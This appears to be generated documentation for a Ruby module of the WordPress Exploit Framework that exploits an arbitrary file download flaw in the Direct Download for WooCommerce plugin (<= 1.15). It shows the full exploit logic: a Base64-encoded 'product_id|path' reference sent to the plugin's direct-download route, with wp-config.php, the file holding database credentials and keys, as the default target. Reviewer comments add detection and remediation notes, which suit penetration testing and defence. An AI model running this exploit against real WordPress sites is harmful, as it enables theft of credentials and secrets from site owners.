class Wpxf::Auxiliary::DirectDownloadForWoocommerceFileDownload

Public Class Methods

new()
Calls superclass method Wpxf::WordPress::FileDownload::new
# File lib/wpxf/modules/auxiliary/file_download/direct_download_for_woocommerce_file_download.rb, line 6
# Sets up the module: runs the parent initializer, records the module
# metadata and registers the single option this module adds.
#
# The metadata ties the module to WPVDB entry 8724 and to plugin versions
# up to and including 1.15 (per the module name), so anyone triaging a
# finding can look up the advisory and the fixed release.
def initialize
  super

  credits = [
    'Diego Celdran Morell', # Disclosure
    'rastating'             # WPXF module
  ]
  advisories = [['WPVDB', '8724']]

  update_info(
    name: 'Direct Download for WooCommerce <= 1.15 File Download',
    author: credits,
    references: advisories,
    date: 'Jan 17 2017'
  )

  # product_id is mandatory: it is embedded in every download reference
  # built by #download_ref.
  product_option = IntegerOption.new(
    name: 'product_id',
    desc: 'A valid product ID that has direct download enabled',
    required: true
  )
  register_options([product_option])
end

Public Instance Methods

check()
# File lib/wpxf/modules/auxiliary/file_download/direct_download_for_woocommerce_file_download.rb, line 30
# Fingerprints the plugin's `direct-download` route.
#
# Requests `<site>/direct-download/<token>`, where the token comes from
# Utility::Text.rand_alpha(5) (presumably five random letters), and looks
# at the response body.
#
# NOTE(review): a :vulnerable result only shows that the route answered
# with the plugin's refusal message. The installed version is never
# compared against 1.15, so confirm the plugin version before reporting
# the site as affected. The method never returns a "safe" verdict.
#
# @return [Symbol] :vulnerable when a response arrived and its body holds
#   the refusal message; :unknown otherwise (no response, or other body)
def check
  probe_url = normalize_uri(full_uri, 'direct-download', Utility::Text.rand_alpha(5))
  response = execute_get_request(url: probe_url)

  if response && !validate_content(response.body)
    :vulnerable
  else
    :unknown
  end
end
default_remote_file_path()
# File lib/wpxf/modules/auxiliary/file_download/direct_download_for_woocommerce_file_download.rb, line 41
# Default value for the remote file path.
# NOTE(review): presumably used by the parent FileDownload module when the
# operator does not set a path; confirm in Wpxf::WordPress::FileDownload.
#
# In a standard WordPress install, wp-config.php holds the database
# credentials and the authentication keys and salts. If server logs show
# this file was served through the direct-download route, rotate those
# secrets as part of the response.
#
# @return [String] the file name 'wp-config.php'
def default_remote_file_path
  'wp-config.php'
end
download_ref()
# File lib/wpxf/modules/auxiliary/file_download/direct_download_for_woocommerce_file_download.rb, line 49
# Builds the reference token placed in the last segment of the download URL.
#
# The token is the strict (no line breaks) Base64 encoding of
# "<product_id>|<remote_file>". The file part is passed through exactly as
# configured, with no normalisation in this method.
#
# Detection note: decoding the final path segment of requests to
# `/direct-download/` in access logs shows which product ID and file path
# were requested; a path that is not a product download is worth alerting on.
#
# @return [String] Base64 text of the "id|path" pair
def download_ref
  id = product_id
  path = remote_file
  Base64.strict_encode64("#{id}|#{path}")
end
downloader_url()
# File lib/wpxf/modules/auxiliary/file_download/direct_download_for_woocommerce_file_download.rb, line 53
# URL the file is requested from: the site base URI, the plugin's
# `direct-download` route, then the encoded reference from #download_ref.
#
# @return the value produced by normalize_uri for those three parts
def downloader_url
  base = full_uri
  reference = download_ref
  normalize_uri(base, 'direct-download', reference)
end
product_id()
# File lib/wpxf/modules/auxiliary/file_download/direct_download_for_woocommerce_file_download.rb, line 37
# Reads the 'product_id' option registered in #initialize.
#
# @return the normalized value of the 'product_id' option, as returned by
#   normalized_option_value
def product_id
  option_name = 'product_id'
  normalized_option_value(option_name)
end
validate_content(content)
# File lib/wpxf/modules/auxiliary/file_download/direct_download_for_woocommerce_file_download.rb, line 57
# Decides whether a response body looks like file content rather than the
# plugin's refusal page.
#
# The only test is that the refusal message is absent. Any other body
# (an error page, a login redirect, a block page from a filtering proxy)
# also passes, so a saved "download" should be inspected before it is
# trusted as the requested file.
#
# @param content [String] response body to inspect
# @return [Boolean] true when the refusal message does not appear
def validate_content(content)
  refusal_position = content =~ /This product is not available for direct free download/
  refusal_position.nil?
end
working_directory()
# File lib/wpxf/modules/auxiliary/file_download/direct_download_for_woocommerce_file_download.rb, line 45
# Human-readable description of a directory on the target.
# NOTE(review): presumably the directory that relative remote file paths
# are resolved against, shown in option help text; confirm against
# Wpxf::WordPress::FileDownload.
#
# @return [String] descriptive text, not a filesystem path
def working_directory
  'the WordPress installation directory'
end